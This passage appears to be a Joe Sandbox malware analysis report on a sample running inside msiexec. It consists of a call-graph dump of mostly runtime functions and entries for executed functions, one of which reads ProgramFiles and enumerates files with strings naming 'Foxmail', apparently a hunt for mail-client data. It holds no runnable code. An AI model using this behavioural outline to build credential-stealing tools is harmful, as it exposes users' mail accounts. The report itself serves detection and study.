calls 6477->6479 6481 235f8d99 6477->6481 6480 235f8d64 6478->6480 6482 235f8da4 6479->6482 6483 235f6368 _free 20 API calls 6480->6483 6481->6468 6484 235f6368 _free 20 API calls 6482->6484 6485 235f8d6c 6483->6485 6486 235f8dac 6484->6486 6485->6468 6487 235f62ac _abort 26 API calls 6486->6487 6487->6485 6489 235f8dc9 6488->6489 6490 235f8dd6 6488->6490 6491 235f6368 _free 20 API calls 6489->6491 6492 235f8de2 6490->6492 6493 235f6368 _free 20 API calls 6490->6493 6494 235f8dce 6491->6494 6492->6418 6495 235f8e03 6493->6495 6494->6418 6496 235f62ac _abort 26 API calls 6495->6496 6496->6494 6498 235f5b0c 6497->6498 6499 235f5b12 6497->6499 6500 235f5e08 __dosmaperr 11 API calls 6498->6500 6501 235f637b __dosmaperr 20 API calls 6499->6501 6503 235f5b61 SetLastError 6499->6503 6500->6499 6502 235f5b24 6501->6502 6504 235f5b2c 6502->6504 6505 235f5e5e __dosmaperr 11 API calls 6502->6505 6503->6421 6507 235f571e _free 20 API calls 6504->6507 6506 235f5b41 6505->6506 6506->6504 6509 235f5b48 6506->6509 6508 235f5b32 6507->6508 6510 235f5b6d SetLastError 6508->6510 6511 235f593c __dosmaperr 20 API calls 6509->6511 6517 235f55a8 6510->6517 6512 235f5b53 6511->6512 6514 235f571e _free 20 API calls 6512->6514 6516 235f5b5a 6514->6516 6516->6503 6516->6510 6528 235f7613 6517->6528 6520 235f55b8 6522 235f55c2 IsProcessorFeaturePresent 6520->6522 6527 235f55e0 6520->6527 6523 235f55cd 6522->6523 6525 235f60e2 _abort 8 API calls 6523->6525 6525->6527 6558 235f4bc1 6527->6558 6529 235f7581 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6528->6529 6530 235f55ad 6529->6530 6530->6520 6531 235f766e 6530->6531 6532 235f767a _abort 6531->6532 6533 235f5b7a __dosmaperr 20 API calls 6532->6533 6536 235f76a7 _abort 6532->6536 6539 235f76a1 _abort 6532->6539 6533->6539 6534 235f76f3 6535 235f6368 _free 20 API calls 6534->6535 6537 235f76f8 6535->6537 6541 235f5671 _abort RtlEnterCriticalSection 6536->6541 6543 235f771f 6536->6543 6540 235f62ac _abort 26 API calls 6537->6540 6538 235fbdc9 _abort 5 API calls 6542 235f7875 6538->6542 6539->6534 6539->6536 6557 235f76d6 6539->6557 6540->6557 6541->6543 6542->6520 6544 235f777e 6543->6544 6547 235f7776 6543->6547 6548 235f56b9 _abort RtlLeaveCriticalSection 6543->6548 6554 235f77a9 6543->6554 6550 235f7665 _abort 38 API calls 6544->6550 6544->6554 6545 235f782e _abort RtlLeaveCriticalSection 6546 235f77fd 6545->6546 6551 235f5af6 _abort 38 API calls 6546->6551 6555 235f780c 6546->6555 6546->6557 6549 235f4bc1 _abort 28 API calls 6547->6549 6548->6547 6549->6544 6552 235f779f 6550->6552 6551->6555 6553 235f7665 _abort 38 API calls 6552->6553 6553->6554 6554->6545 6556 235f5af6 _abort 38 API calls 6555->6556 6555->6557 6556->6557 6557->6538 6559 235f499b _abort 28 API calls 6558->6559 6560 235f4bd2 6559->6560 6562 235f5af6 _abort 38 API calls 6561->6562 6563 235f7c24 6562->6563 6566 235f7a00 6563->6566 6567 235f7a28 6566->6567 6568 235f7a13 6566->6568 6567->6429 6568->6567 6570 235f7f0f 6568->6570 6571 235f7f1b ___DestructExceptionObject 6570->6571 6572 235f5af6 _abort 38 API calls 6571->6572 6573 235f7f24 6572->6573 6574 235f7f72 _abort 6573->6574 6575 235f5671 _abort RtlEnterCriticalSection 6573->6575 6574->6567 6576 235f7f42 6575->6576 6577 235f7f86 __fassign 20 API calls 6576->6577 6578 235f7f56 6577->6578 6579 235f7f75 __fassign RtlLeaveCriticalSection 6578->6579 6580 235f7f69 6579->6580 6580->6574 6581 235f55a8 _abort 38 API calls 6580->6581 6581->6574 6582->6412 6586 235fad24 6583->6586 6585 235fadca 6585->6327 6587 235fad30 ___DestructExceptionObject 6586->6587 6597 235f8c7b RtlEnterCriticalSection 6587->6597 6589 235fad3e 6590 235fad65 6589->6590 6591 235fad70 6589->6591 6598 235fae4d 6590->6598 6592 235f6368 _free 20 API calls 6591->6592 6594 235fad6b 6592->6594 6613 235fad9a 6594->6613 6596 235fad8d _abort 6596->6585 6597->6589 6599 235f8d52 26 API calls 6598->6599 6602 235fae5d 6599->6602 6600 235fae63 6616 235f8cc1 6600->6616 6602->6600 6603 235fae95 6602->6603 6605 235f8d52 26 API calls 6602->6605 6603->6600 6606 235f8d52 26 API calls 6603->6606 6608 235fae8c 6605->6608 6609 235faea1 CloseHandle 6606->6609 6607 235faedd 6607->6594 6611 235f8d52 26 API calls 6608->6611 6609->6600 6612 235faead GetLastError 6609->6612 6610 235f6332 __dosmaperr 20 API calls 6610->6607 6611->6603 6612->6600 6625 235f8c9e RtlLeaveCriticalSection 6613->6625 6615 235fada4 6615->6596 6617 235f8d37 6616->6617 6618 235f8cd0 6616->6618 6619 235f6368 _free 20 API calls 6617->6619 6618->6617 6624 235f8cfa 6618->6624 6620 235f8d3c 6619->6620 6621 235f6355 __dosmaperr 20 API calls 6620->6621 6622 235f8d27 6621->6622 6622->6607 6622->6610 6623 235f8d21 SetStdHandle 6623->6622 6624->6622 6624->6623 6625->6615 6626->6301 6627->6281 7427 235f7bc7 7428 235f7bd3 ___DestructExceptionObject 7427->7428 7429 235f7c0a _abort 7428->7429 7435 235f5671 RtlEnterCriticalSection 7428->7435 7431 235f7be7 7436 235f7f86 7431->7436 7435->7431 7437 235f7f94 __fassign 7436->7437 7439 235f7bf7 7436->7439 7438 235f7cc2 __fassign 20 API calls 7437->7438 7437->7439 7438->7439 7440 235f7c10 7439->7440 7443 235f56b9 RtlLeaveCriticalSection 7440->7443 7442 235f7c17 7442->7429 7443->7442 7444 235fa1c6 IsProcessorFeaturePresent 6628 235fa945 6630 235fa96d 6628->6630 6629 235fa9a5 6630->6629 6631 235fa99e 6630->6631 6632 235fa997 6630->6632 6641 235faa00 6631->6641 6637 235faa17 6632->6637 6638 235faa20 6637->6638 6645 235fb19b 6638->6645 6642 235faa20 6641->6642 6643 235fb19b __startOneArgErrorHandling 21 API calls 6642->6643 6644 235fa9a3 6643->6644 6646 235fb1da __startOneArgErrorHandling 6645->6646 6651 235fb25c __startOneArgErrorHandling 6646->6651 6655 235fb59e 6646->6655 6648 235fb286 6650 235fb292 6648->6650 6662 235fb8b2 6648->6662 6652 235f2ada _ValidateLocalCookies 5 API calls 6650->6652 6651->6648 6658 235f78a3 6651->6658 6654 235fa99c 6652->6654 6669 235fb5c1 6655->6669 6659 235f78cb 6658->6659 6660 235f2ada _ValidateLocalCookies 5 API calls 6659->6660 6661 235f78e8 6660->6661 6661->6648 6663 235fb8bf 6662->6663 6664 235fb8d4 6662->6664 6665 235fb8d9 6663->6665 6667 235f6368 _free 20 API calls 6663->6667 6666 235f6368 _free 20 API calls 6664->6666 6665->6650 6666->6665 6668 235fb8cc 6667->6668 6668->6650 6670 235fb5ec __raise_exc 6669->6670 6671 235fb7e5 RaiseException 6670->6671 6672 235fb5bc 6671->6672 6672->6651 6673 235faf43 6674 235faf4d 6673->6674 6675 235faf59 6673->6675 6674->6675 6676 235faf52 CloseHandle 6674->6676 6676->6675 6812 235f5303 6815 235f50a5 6812->6815 6824 235f502f 6815->6824 6818 235f502f 5 API calls 6819 235f50c3 6818->6819 6820 235f5000 20 API calls 6819->6820 6821 235f50ce 6820->6821 6822 235f5000 20 API calls 6821->6822 6823 235f50d9 6822->6823 6827 235f5048 6824->6827 6825 235f2ada _ValidateLocalCookies 5 API calls 6826 235f5069 6825->6826 6826->6818 6827->6825 6828 235f7103 GetCommandLineA GetCommandLineW 6677 235f8640 6680 235f8657 6677->6680 6681 235f8679 6680->6681 6682 235f8665 6680->6682 6684 235f8693 6681->6684 6685 235f8681 6681->6685 6683 235f6368 _free 20 API calls 6682->6683 6686 235f866a 6683->6686 6691 235f8652 6684->6691 6693 235f54a7 6684->6693 6687 235f6368 _free 20 API calls 6685->6687 6689 235f62ac _abort 26 API calls 6686->6689 6690 235f8686 6687->6690 6689->6691 6692 235f62ac _abort 26 API calls 6690->6692 6692->6691 6694 235f54c4 6693->6694 6700 235f54ba 6693->6700 6695 235f5af6 _abort 38 API calls 6694->6695 6694->6700 6696 235f54e5 6695->6696 6697 235f7a00 __fassign 38 API calls 6696->6697 6698 235f54fe 6697->6698 6701 235f7a2d 6698->6701 6700->6691 6702 235f7a55 6701->6702 6703 235f7a40 6701->6703 6702->6700 6703->6702 6705 235f6d7e 6703->6705 6706 235f6d8a ___DestructExceptionObject 6705->6706 6707 235f5af6 _abort 38 API calls 6706->6707 6709 235f6d94 6707->6709 6710 235f6e18 _abort 6709->6710 6712 235f55a8 _abort 38 API calls 6709->6712 6713 235f571e _free 20 API calls 6709->6713 6714 235f5671 RtlEnterCriticalSection 6709->6714 6715 235f6e0f 6709->6715 6710->6702 6712->6709 6713->6709 6714->6709 6718 235f56b9 RtlLeaveCriticalSection 6715->6718 6717 235f6e16 6717->6709 6718->6717 7530 235f7a80 7531 235f7a8d 7530->7531 7532 235f637b __dosmaperr 20 API calls 7531->7532 7533 235f7aa7 7532->7533 7534 235f571e _free 20 API calls 7533->7534 7535 235f7ab3 7534->7535 7536 235f637b __dosmaperr 20 API calls 7535->7536 7540 235f7ad9 7535->7540 7537 235f7acd 7536->7537 7539 235f571e _free 20 API calls 7537->7539 7538 235f5eb7 11 API calls 7538->7540 7539->7540 7540->7538 7541 235f7ae5 7540->7541 6829 235f1f3f 6830 235f1f4b ___DestructExceptionObject 6829->6830 6847 235f247c 6830->6847 6832 235f1f57 ___scrt_is_nonwritable_in_current_image 6833 235f1f52 6833->6832 6834 235f1f7c 6833->6834 6835 235f2041 6833->6835 6858 235f23de 6834->6858 6837 235f2639 ___scrt_fastfail 4 API calls 6835->6837 6838 235f2048 6837->6838 6839 235f1f8b __RTC_Initialize 6839->6832 6861 235f22fc RtlInitializeSListHead 6839->6861 6841 235f1f99 ___scrt_initialize_default_local_stdio_options 6862 235f46c5 6841->6862 6845 235f1fb8 6845->6832 6846 235f4669 _abort 5 API calls 6845->6846 6846->6832 6848 235f2485 6847->6848 6870 235f2933 IsProcessorFeaturePresent 6848->6870 6852 235f2496 6853 235f249a 6852->6853 6881 235f53c8 6852->6881 6853->6833 6856 235f24b1 6856->6833 6857 235f3529 ___vcrt_uninitialize 8 API calls 6857->6853 6917 235f24b5 6858->6917 6860 235f23e5 6860->6839 6861->6841 6864 235f46dc 6862->6864 6863 235f2ada _ValidateLocalCookies 5 API calls 6865 235f1fad 6863->6865 6864->6863 6865->6832 6866 235f23b3 6865->6866 6867 235f23b8 ___scrt_release_startup_lock 6866->6867 6868 235f2933 ___isa_available_init IsProcessorFeaturePresent 6867->6868 6869 235f23c1 6867->6869 6868->6869 6869->6845 6871 235f2491 6870->6871 6872 235f34ea 6871->6872 6873 235f34ef ___vcrt_initialize_winapi_thunks 6872->6873 6884 235f3936 6873->6884 6876 235f34fd 6876->6852 6878 235f3505 6879 235f3510 6878->6879 6880 235f3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6878->6880 6879->6852 6880->6876 6913 235f7457 6881->6913 6885 235f393f 6884->6885 6887 235f3968 6885->6887 6889 235f34f9 6885->6889 6898 235f3be0 6885->6898 6888 235f3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6887->6888 6888->6889 6889->6876 6890 235f38e8 6889->6890 6903 235f3af1 6890->6903 6895 235f3918 6895->6878 6896 235f391b ___vcrt_uninitialize_ptd 6 API calls 6897 235f38fd 6896->6897 6897->6878 6899 235f3a82 try_get_function 5 API calls 6898->6899 6900 235f3bfa 6899->6900 6901 235f3c18 InitializeCriticalSectionAndSpinCount 6900->6901 6902 235f3c03 6900->6902 6901->6902 6902->6885 6904 235f3a82 try_get_function 5 API calls 6903->6904 6905 235f3b0b 6904->6905 6906 235f3b24 TlsAlloc 6905->6906 6907 235f38f2 6905->6907 6907->6897 6908 235f3ba2 6907->6908 6909 235f3a82 try_get_function 5 API calls 6908->6909 6910 235f3bbc 6909->6910 6911 235f390b 6910->6911 6912 235f3bd7 TlsSetValue 6910->6912 6911->6895 6911->6896 6912->6911 6916 235f7470 6913->6916 6914 235f2ada _ValidateLocalCookies 5 API calls 6915 235f24a3 6914->6915 6915->6856 6915->6857 6916->6914 6918 235f24c8 6917->6918 6919 235f24c4 6917->6919 6920 235f2639 ___scrt_fastfail 4 API calls 6918->6920 6922 235f24d5 ___scrt_release_startup_lock 6918->6922 6919->6860 6921 235f2559 6920->6921 6922->6860 7445 235f5bff 7453 235f5d5c 7445->7453 7448 235f5c13 7449 235f5b7a __dosmaperr 20 API calls 7450 235f5c1b 7449->7450 7451 235f5c28 7450->7451 7452 235f5c2b 11 API calls 7450->7452 7452->7448 7454 235f5c45 __dosmaperr 5 API calls 7453->7454 7455 235f5d83 7454->7455 7456 235f5d9b TlsAlloc 7455->7456 7459 235f5d8c 7455->7459 7456->7459 7457 235f2ada _ValidateLocalCookies 5 API calls 7458 235f5c09 7457->7458 7458->7448 7458->7449 7459->7457 7542 235f67bf 7547 235f67f4 7542->7547 7545 235f67db 7546 235f571e _free 20 API calls 7546->7545 7548 235f6806 7547->7548 7549 235f67cd 7547->7549 7550 235f680b 7548->7550 7551 235f6836 7548->7551 7549->7545 7549->7546 7552 235f637b __dosmaperr 20 API calls 7550->7552 7551->7549 7558 235f71d6 7551->7558 7554 235f6814 7552->7554 7556 235f571e _free 20 API calls 7554->7556 7555 235f6851 7557 235f571e _free 20 API calls 7555->7557 7556->7549 7557->7549 7559 235f71e1 7558->7559 7560 235f7209 7559->7560 7562 235f71fa 7559->7562 7561 235f7218 7560->7561 7567 235f8a98 7560->7567 7574 235f8acb 7561->7574 7564 235f6368 _free 20 API calls 7562->7564 7566 235f71ff ___scrt_fastfail 7564->7566 7566->7555 7568 235f8ab8 RtlSizeHeap 7567->7568 7569 235f8aa3 7567->7569 7568->7561 7570 235f6368 _free 20 API calls 7569->7570 7571 235f8aa8 7570->7571 7572 235f62ac _abort 26 API calls 7571->7572 7573 235f8ab3 7572->7573 7573->7561 7575 235f8ad8 7574->7575 7576 235f8ae3 7574->7576 7577 235f56d0 21 API calls 7575->7577 7578 235f8aeb 7576->7578 7584 235f8af4 __dosmaperr 7576->7584 7583 235f8ae0 7577->7583 7579 235f571e _free 20 API calls 7578->7579 7579->7583 7580 235f8b1e RtlReAllocateHeap 7580->7583 7580->7584 7581 235f8af9 7582 235f6368 _free 20 API calls 7581->7582 7582->7583 7583->7566 7584->7580 7584->7581 7585 235f474f __dosmaperr 7 API calls 7584->7585 7585->7584 6923 235f543d 6924 235f5440 6923->6924 6925 235f55a8 _abort 38 API calls 6924->6925 6926 235f544c 6925->6926 7586 235f9db8 7587 235f9dbf 7586->7587 7588 235f9e20 7587->7588 7592 235f9ddf 7587->7592 7589 235faa17 21 API calls 7588->7589 7590 235fa90e 7588->7590 7591 235f9e6e 7589->7591 7592->7590 7593 235faa17 21 API calls 7592->7593 7594 235fa93e 7593->7594 7595 235f3eb3 7596 235f5411 38 API calls 7595->7596 7597 235f3ebb 7596->7597 6719 235f9e71 6720 235f9e95 6719->6720 6722 235fac6b __startOneArgErrorHandling 6720->6722 6723 235f9eae 6720->6723 6721 235f9ef8 6726 235facad __startOneArgErrorHandling 6722->6726 6737 235fb2f0 6722->6737 6723->6721 6727 235faa53 6723->6727 6728 235faa70 RtlDecodePointer 6727->6728 6729 235faa80 6727->6729 6728->6729 6730 235fab0d 6729->6730 6733 235fab02 6729->6733 6735 235faab7 6729->6735 6730->6733 6734 235f6368 _free 20 API calls 6730->6734 6731 235f2ada _ValidateLocalCookies 5 API calls 6732 235fac67 6731->6732 6732->6721 6733->6731 6734->6733 6735->6733 6736 235f6368 _free 20 API calls 6735->6736 6736->6733 6738 235fb329 __startOneArgErrorHandling 6737->6738 6739 235fb5c1 __raise_exc RaiseException 6738->6739 6740 235fb350 __startOneArgErrorHandling 6738->6740 6739->6740 6741 235fb393 6740->6741 6742 235fb36e 6740->6742 6743 235fb8b2 __startOneArgErrorHandling 20 API calls 6741->6743 6748 235fb8e1 6742->6748 6745 235fb38e __startOneArgErrorHandling 6743->6745 6746 235f2ada _ValidateLocalCookies 5 API calls 6745->6746 6747 235fb3b7 6746->6747 6747->6726 6749 235fb8f0 6748->6749 6750 235fb90f __startOneArgErrorHandling 6749->6750 6751 235fb964 __startOneArgErrorHandling 6749->6751 6752 235f78a3 __startOneArgErrorHandling 5 API calls 6750->6752 6753 235fb8b2 __startOneArgErrorHandling 20 API calls 6751->6753 6754 235fb950 6752->6754 6756 235fb95d 6753->6756 6755 235fb8b2 __startOneArgErrorHandling 20 API calls 6754->6755 6754->6756 6755->6756 6756->6745 6757 235f3370 6768 235f3330 6757->6768 6769 235f334f 6768->6769 6770 235f3342 6768->6770 6771 235f2ada _ValidateLocalCookies 5 API calls 6770->6771 6771->6769 6927 235f5630 6928 235f563b 6927->6928 6930 235f5664 6928->6930 6932 235f5660 6928->6932 6933 235f5eb7 6928->6933 6940 235f5688 6930->6940 6934 235f5c45 __dosmaperr 5 API calls 6933->6934 6935 235f5ede 6934->6935 6936 235f5efc InitializeCriticalSectionAndSpinCount 6935->6936 6937 235f5ee7 6935->6937 6936->6937 6938 235f2ada _ValidateLocalCookies 5 API calls 6937->6938 6939 235f5f13 6938->6939 6939->6928 6941 235f56b4 6940->6941 6942 235f5695 6940->6942 6941->6932 6943 235f569f RtlDeleteCriticalSection 6942->6943 6943->6941 6943->6943 7460 235f63f0 7461 235f6400 7460->7461 7468 235f6416 7460->7468 7462 235f6368 _free 20 API calls 7461->7462 7463 235f6405 7462->7463 7464 235f62ac _abort 26 API calls 7463->7464 7466 235f640f 7464->7466 7465 235f4e76 20 API calls 7472 235f64e5 7465->7472 7467 235f6480 7467->7465 7467->7467 7468->7467 7473 235f6561 7468->7473 7479 235f6580 7468->7479 7470 235f64ee 7471 235f571e _free 20 API calls 7470->7471 7471->7473 7472->7470 7476 235f6573 7472->7476 7490 235f85eb 7472->7490 7499 235f679a 7473->7499 7477 235f62bc _abort 11 API calls 7476->7477 7478 235f657f 7477->7478 7480 235f658c 7479->7480 7480->7480 7481 235f637b __dosmaperr 20 API calls 7480->7481 7482 235f65ba 7481->7482 7483 235f85eb 26 API calls 7482->7483 7484 235f65e6 7483->7484 7485 235f62bc _abort 11 API calls 7484->7485 7486 235f6615 ___scrt_fastfail 7485->7486 7487 235f66b6 FindFirstFileExA 7486->7487 7488 235f6705 7487->7488 7489 235f6580 26 API calls 7488->7489 7492 235f853a 7490->7492 7491 235f854f 7493 235f6368 _free 20 API calls 7491->7493 7494 235f8554 7491->7494 7492->7491 7492->7494 7497 235f858b 7492->7497 7495 235f857a 7493->7495 7494->7472 7496 235f62ac _abort 26 API calls 7495->7496 7496->7494 7497->7494 7498 235f6368 _free 20 API calls 7497->7498 7498->7495 7500 235f67a4 7499->7500 7501 235f67b4 7500->7501 7502 235f571e _free 20 API calls 7500->7502 7503 235f571e _free 20 API calls 7501->7503 7502->7500 7504 235f67bb 7503->7504 7504->7466 6772 235f506f 6773 235f5087 6772->6773 6774 235f5081 6772->6774 6776 235f5000 6774->6776 6780 235f502a 6776->6780 6781 235f500d 6776->6781 6777 235f5024 6779 235f571e _free 20 API calls 6777->6779 6778 235f571e _free 20 API calls 6778->6781 6779->6780 6780->6773 6781->6777 6781->6778 7602 235f60ac 7603 235f60dd 7602->7603 7604 235f60b7 7602->7604 7604->7603 7605 235f60c7 FreeLibrary 7604->7605 7605->7604 6782 235fac6b 6783 235fac84 __startOneArgErrorHandling 6782->6783 6784 235fb2f0 21 API calls 6783->6784 6785 235facad __startOneArgErrorHandling 6783->6785 6784->6785 6944 235f742b 6947 235f7430 6944->6947 6946 235f7453 6947->6946 6948 235f8bae 6947->6948 6949 235f8bbb 6948->6949 6950 235f8bdd 6948->6950 6951 235f8bc9 RtlDeleteCriticalSection 6949->6951 6952 235f8bd7 6949->6952 6950->6947 6951->6951 6951->6952 6953 235f571e _free 20 API calls 6952->6953 6953->6950 7606 235fc7a7 7607 235fc7be 7606->7607 7614 235fc80d 7606->7614 7607->7614 7615 235fc7e6 GetModuleHandleA 7607->7615 7609 235fc835 GetModuleHandleA 7609->7614 7610 235fc872 7611 235fc85f GetProcAddress 7611->7614 7614->7609 7614->7610 7614->7611 7616 235fc7ef 7615->7616 7622 235fc80d 7615->7622 7624 235fc803 GetProcAddress 7616->7624 7619 235fc835 GetModuleHandleA 7619->7622 7620 235fc872 7622->7619 7622->7620 7623 235fc85f GetProcAddress 7622->7623 7623->7622 7627 235fc80d 7624->7627 7625 235fc835 GetModuleHandleA 7625->7627 7626 235fc872 7627->7625 7627->7626 7628 235fc85f GetProcAddress 7627->7628 7628->7627 7629 235f21a1 ___scrt_dllmain_exception_filter 7505 235fa1e0 7508 235fa1fe 7505->7508 7507 235fa1f6 7511 235fa203 7508->7511 7509 235fa298 7509->7507 7510 235faa53 21 API calls 7512 235fa42f 7510->7512 7511->7509 7511->7510 7512->7507 7630 235f81a0 7631 235f81d9 7630->7631 7632 235f81dd 7631->7632 7643 235f8205 7631->7643 7633 235f6368 _free 20 API calls 7632->7633 7635 235f81e2 7633->7635 7634 235f8529 7637 235f2ada _ValidateLocalCookies 5 API calls 7634->7637 7636 235f62ac _abort 26 API calls 7635->7636 7639 235f81ed 7636->7639 7638 235f8536 7637->7638 7640 235f2ada _ValidateLocalCookies 5 API calls 7639->7640 7642 235f81f9 7640->7642 7643->7634 7644 235f80c0 7643->7644 7645 235f80db 7644->7645 7646 235f2ada _ValidateLocalCookies 5 API calls 7645->7646 7647 235f8152 7646->7647 7647->7643

                                                                            Executed Functions

                                                                            Function 235F10F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 235F1137
                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 235F1151
                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 235F115C
                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 235F116D
                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 235F117C
                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 235F1193
                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 235F11D0
                                                                            • FindClose.KERNEL32(00000000), ref: 235F11DB
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                            • String ID:
                                                                            • API String ID: 1083526818-0
                                                                            • Opcode ID: 15789733ecceceee9113b20b5649d572d01d5f97333a297d1715b2da50ca60f8
                                                                            • Instruction ID: a3e5340a086e18090ee3a137b1accf4ad2ab0ad4b3b7a17bb9ac6784766fbf8e
                                                                            • Opcode Fuzzy Hash: 15789733ecceceee9113b20b5649d572d01d5f97333a297d1715b2da50ca60f8
                                                                            • Instruction Fuzzy Hash: C4216F725043486BD720EA64AC4CF9B7BECEF85314F04096ABA5CD3190FB75D6098796
                                                                            Function 235F12EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 235F1434
                                                                              • Part of subcall function 235F10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 235F1137
                                                                              • Part of subcall function 235F10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 235F1151
                                                                              • Part of subcall function 235F10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 235F115C
                                                                              • Part of subcall function 235F10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 235F116D
                                                                              • Part of subcall function 235F10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 235F117C
                                                                              • Part of subcall function 235F10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 235F1193
                                                                              • Part of subcall function 235F10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 235F11D0
                                                                              • Part of subcall function 235F10F1: FindClose.KERNEL32(00000000), ref: 235F11DB
                                                                            • lstrlenW.KERNEL32(?), ref: 235F14C5
                                                                            • lstrlenW.KERNEL32(?), ref: 235F14E0
                                                                            • lstrlenW.KERNEL32(?,?), ref: 235F150F
                                                                            • lstrcatW.KERNEL32(00000000), ref: 235F1521
                                                                            • lstrlenW.KERNEL32(?,?), ref: 235F1547
                                                                            • lstrcatW.KERNEL32(00000000), ref: 235F1553
                                                                            • lstrlenW.KERNEL32(?,?), ref: 235F1579
                                                                            • lstrcatW.KERNEL32(00000000), ref: 235F1585
                                                                            • lstrlenW.KERNEL32(?,?), ref: 235F15AB
                                                                            • lstrcatW.KERNEL32(00000000), ref: 235F15B7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                            • String ID: )$Foxmail$ProgramFiles
                                                                            • API String ID: 672098462-2938083778
                                                                            • Opcode ID: 0672737baea56e352126acaa9dd2138ae2eadbba441f6eabc25334f3970571a6
                                                                            • Instruction ID: 6661c667b92c01fd99d0e239c4de0b6341a3856d596a49eb77852a3ff4c71743
                                                                            • Opcode Fuzzy Hash: 0672737baea56e352126acaa9dd2138ae2eadbba441f6eabc25334f3970571a6
                                                                            • Instruction Fuzzy Hash: 8681AF75A40358AADB30DBA1AC86FEE737DEF85700F0005DAE508E7190EB715B85CB95

                                                                            Non-executed Functions

                                                                            Function 235F60E2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 235F61DA
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 235F61E4
                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 235F61F1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                            • String ID: [nk/
                                                                            • API String ID: 3906539128-416449849
                                                                            • Opcode ID: 4e9d1a6b078aef7efd78cd0c2e653a9f591ab1af34665d9189f0c3edbafc728e
                                                                            • Instruction ID: 6a21dff581d90741bbec95f48036ac490b4b5cb5ff823e7c2908285ef293027f
                                                                            • Opcode Fuzzy Hash: 4e9d1a6b078aef7efd78cd0c2e653a9f591ab1af34665d9189f0c3edbafc728e
                                                                            • Instruction Fuzzy Hash: E031D4B491121CABCB21DF24D988B8DBBF8FF59310F5041DAE81CA7250E7349B858F85
                                                                            Function 235F6580 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .$[nk/
                                                                            • API String ID: 0-1421376372
                                                                            • Opcode ID: d6c7a718f85cbc86213945df3e1a00825106d90cf08715032dce04939cd5d180
                                                                            • Instruction ID: 0efc05e466774387ea2fe75a9816c4bfbdbbd4e56ff8b8fad83f88834e1b5b12
                                                                            • Opcode Fuzzy Hash: d6c7a718f85cbc86213945df3e1a00825106d90cf08715032dce04939cd5d180
